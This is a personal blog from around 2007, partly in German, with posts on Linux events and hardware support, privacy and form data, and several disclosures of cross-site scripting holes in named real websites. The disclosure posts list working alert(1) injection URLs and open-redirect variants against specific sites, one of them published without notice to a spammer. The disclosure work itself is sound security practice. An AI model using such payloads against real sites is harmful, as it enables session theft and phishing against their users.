Hanno's blog

It's terrifying how many sites there are out there with XSS-issues.

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>

Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.

Napster and MPAA still unfixed.

No text, just some pictures here.

I'm here at the Linux-Infotag 2007 from the linux user group Augsburg. It's a small and familiar event. Seems that there are a lot of freifunk-people (free wlan networks) in augsburg. On my way to Augsburg, fitting to the topic I had to switch trains in the linux-town Treuchtlingen.

I had a talk about 3D-Desktops (Linux 3D-Slides, OpenDocument). Will stay for some more hours.
It's nice to see more local linux events evolving.

Update: Some pictures from the LIT 2007

Ich wollte hier mal ne Idee vorstellen, die mir in jüngerer Zeit öfters bei Gedanken um Datenschutzthemen kam und die ich (in Analogie zu Datamining) Data Poisoning nennen will.
Zur Erklärung: Der Begriff Datamining meint das Sammeln von großen Datenmengen und insbesondere deren automatisierte, elektronische Auswertung im großen Stil.

Tagtäglich gibt man irgendwo seine Daten ab. Und oft genug mehr als man eigentlich möchte. Will ich eine Anfrage an eine Firma stellen, so begrüßt mich häufig ein Formular, welches nebst meiner Adresse gleich noch Telefon, Fax und am liebsten gleich meine Hobbies wissen will. Bei der Anmeldung zu »kostenlosen« Diensten, sei es der neueste Web 2.0-Hype, die nächste Videoplattform oder ein Freemailer, ist es meist noch schlimmer, ganz abgesehen von Businessmodellen, deren ureigener Zweck Datamining ist (Kundenkarten). Meistens möchte ich jedoch nicht mehr als eine Antwort per eMail. Ich habe mir deshalb verstärkt angewöhnt, derartige Formulare mit gezielten Falschdaten zu füllen. Und zwar keine offensichtlichen, sondern leicht verfälschte.

So erscheint es mir durchaus noch plausibel, wenn ein Unternehmen mich mit Namen anreden möchte und manchmal ist auch eine Altersangabe sinnvoll - jedoch, ob mein Geburtstag nun 5 Tage früher oder einen Monat später ist, spielt eigentlich keine Rolle - also kann man ihn durchaus »unscharf« eingeben. Ein Zahlendreher in der Telefonnummer oder Postleitzahl ist schnell passiert, ebenso ein Tippfehler im Namen.
Bewußt sollte man sich bei jedem Formular, welches meine Daten will, fragen, aus welcher Motivation nehme ich hier Kontakt auf und welche Daten erscheinen hierfür plausibel. Den Rest füllt man mit mehr oder weniger Müll, der zwar bei der eigentlichen Kommunikation wenig stört, jedoch beim später automatisierten Zusammenführen sehr wohl.

Gedanken dazu? Sicher, damit wird keine Revolution für den Datenschutz losgetreten. Aber als »Alltagswiderstand«, als kleines Symbol und möglicherweise einfach als Mittel, sich selbst über den Umgang mit den eigenen Daten bewusster zu werden, mag es durchaus taugen.

Hatte ich vergessen, wollte ich noch posten: Hab vor zwei Wochen bei der LUG Backnang eine Kurzeinführung zu OpenStreetmap gegeben, die Slides dazu gibt's wie üblich hier.

Folgende Nachricht schrieb ich an den Support von Napster (das ist dieser DRM-Shop, hervorgegangen aus dem Label eines längst vergessenen Projekts):

Folgende, überaus kompetente Antwort erhielt ich:

My laptop (Samsung P35) has an internal card reader (SD and MemoryStick) done by Ricoh. Several other laptops have this device. It's internally connected as a pcmcia-device and shows up as RICOH Bay1Controller on pccardctl ident.

For years now there was no way to get this thing running in linux, which stopped me from doing projects like having a crypto-key on a small SD-Card and insert that on boot. Now, finally someone did the job and reverse engineered the device: sdricohcs

In my first small tests, I could already download some photos from my digital camera card. No problems so far. Now, the only thing I'm really missing with linux on my laptop left is TV-Out (works with ati binary drivers, but they are unstable like hell). I heared some Xorg-devs are already working on it, so maybe I'll soon announce the »nearby 100%« support for Linux on Samsung P30/P35.

Dieses Bild ist tatsächlich von heute und was aussieht wie verspätete weisse Weihnacht sind Hagelkörner.

Ich wusste doch immer dass die von der Filmindustrie das mit dem Internetz nicht verstanden haben:

I wrote a few days ago (only in german) about my requests to the 1und1-support for information about the hardware of our rootserver (to complete the PCI ID database).

Now, after their first reply, I now got another mail with more useful information: They pointed me to the tool dmidecode, which can find lot's of information about the BIOS and the motherboard. Didn't know that before, it's also useful to find out the BIOS version on a running system.

Now, this looks like what I was looking for:
Handle 0x0002, DMI type 2, 8 bytes
Base Board Information
Manufacturer: FUJITSU SIEMENS
Product Name: D2030-A1

Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come).

For my english visitors, here are the urls:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('

Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com

Von XSS (Cross Site Scripting) spricht man, wenn es durch Usereingaben möglich ist, bei einer Seite eigenen HTML und JavaScript-Code einzufügen. Das ist insbesondere dann ein Problem, wenn die Seite (auf der selben Domain reicht) in irgendeiner Weise Sessions und Accounts nutzt. Warum? Weil es trivial möglich ist, mit etwas JavaScript-Code das Session-Cookie zu übertragen und somit den Account zu hijacken.

Ein simples Beispiel:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>

Durch die bloße Eingabe von "><script>alert(1)</script> oder <script>alert(1)</script> lässt sich jedes Formular auf triviale XSS-Probleme checken (einfach mal ausprobieren).

Problemfall Frames: Aufgrund der Tatsache, dass ein bestimmter Framezustand nicht in einer URL festhaltbar ist, haben sich viele Menschen mehr oder weniger sinnvolle Fakes ausgedacht, die dann häufig in der Form http://mydomain.com/framescript?location=siteinframe daherkommen.
Nun kann man sowas ausnutzen, um in einem Frame eine Fremdseite darzustellen. Bis vor kurzem funktionierte dies noch:
http://www.eplus-unternehmen.de/frame.asp?go=http://www.google.de/
Kurze Zeit später wurde selbiges gefiltert, mit folgendem kam man aber immer noch weiter:
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com
Gehen inzwischen alle nicht mehr.
Problem? Phishing. Funktioniert selbiges bei einer Bank oder einem sonstigen Unternehmen, bei dem größere Beträge eine Rolle spielen, ist es für Phisher attraktiv, unbedarften Menschen eine Nachricht zu schicken, die eine echt aussehende URL des Unternehmens enthält.

Was bei obriger URL nach wie vor funktioniert, ist eine etwas trickreichere JavaScript-Injection:
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('
Das schöne hierbei ist, dass die Variable direkt in bereits bestehenden JavaScript-Code eingefügt wird.

Desweiteren hat eplus noch mehr Domains und anderswo funktioniert es noch:
http://www.eplus-unlimited.de/3_1_jingles/index.jsp?toLoad=http://www.google.de//

E-Plus wurde vor über einem Monat mit den ersten Lücken kontaktiert. Die Schließung erfolgte schleppend, weswegen mir die Veröffentlichung hier angemessen erscheint. Die Veröffentlichung wurde vor einer Woche angekündigt. Es wurden keine Lücken publiziert, von denen E-Plus nicht schon mindestens vor einer Woche bescheid wusste.

Credits gehen vor allem an Alexander Brachmann.

In aller Regel betreibe ich Responsible Disclosure: Vor einer öffentlichen Publizierung wird der Anbieter oder Autor der Software mit Vorlauf informiert.

Heut abend beim Webmontag gibt's ne Kurz-Präsentation.

Ich gehör ja noch zu den Idealisten, die wegen Klimawandel, Lärm, Waldsterben, Fächenverbrauch und Co. kein Auto besitzen. Allerdings weiss ich gelegentlich die Nutzung eines fahrbaren Untersatzes doch zu schätzen, finde jedoch bei dem, was es gerade auf dem Markt gibt, nichts, was ansatzweise akzeptabel wär. Zwar hege ich keine seltsam nationalistischen Vorurteile gegen Toyota, finde den Verbrauch des Autos von Boris Palmer jedoch mit knapp 5 Litern immer noch weit über dem, was man eigentlich will. Kleiner 2l/100km wär schon Requirement.

Stefan bloggt über den Loremo, was schonmal deutlich besser klingt. Zwar Diesel (Rußpartikel, Feinstaub), aber immerhin mal ein Spritverbrauch, der für die nächsten 10 Jahre noch im akzeptablen Bereich liegt.

Ich hab zwar keine Ahnung, was OKTE ist oder was die anbieten, aber die haben mir gerade Spam geschickt.

Sidenote:
okte.cn/user.asp?n="><script>alert(1)</script>

(Copy & Paste bitte, ich hoffe, dass das so deren Pagerank nicht positiv beeinflußt)

No responsible disclosure for spammers!

Wie ich ja gestern schrieb, bin ich gerade bemüht, die Device ID-Datenbanken von Linux zu ergänzen. Unser 1und1-Rootserver antwortet auf ein lspci -v mit mehreren Zeilen der Form:
Subsystem: Fujitsu Siemens Computer GmbH Unknown device 1099

Weswegen ich mich bemühte, durch folgende Nachricht an den Support Auskunft über das verwendete Board zu erhalten:
Ich würde gerne die Hardwaredaten unseres Servers vollständig in der Linux PCI ID Datenbank erfasst haben ( http://pciids.sf.net ).
Dafür benötige ich die genaue Produktbezeichnung des in unserem Server verwendeten Motherboards. Es handelt sich, soweit ich sehen kann, um ein Fujitsu-Siemens-Modell.

Beantwortet wurde dies mit:
wenn Sie den Befehl lspci -v per SSH ausführen, sollten Ihnen dazu weitere Informationen angezeigt werden.

Ich erspare mir glaube ich jeden weiteren Kommentar.

(eine gleichzeitig abgeschickte Anfrage an Hetzner wurde übrigens ohne Probleme beantwortet)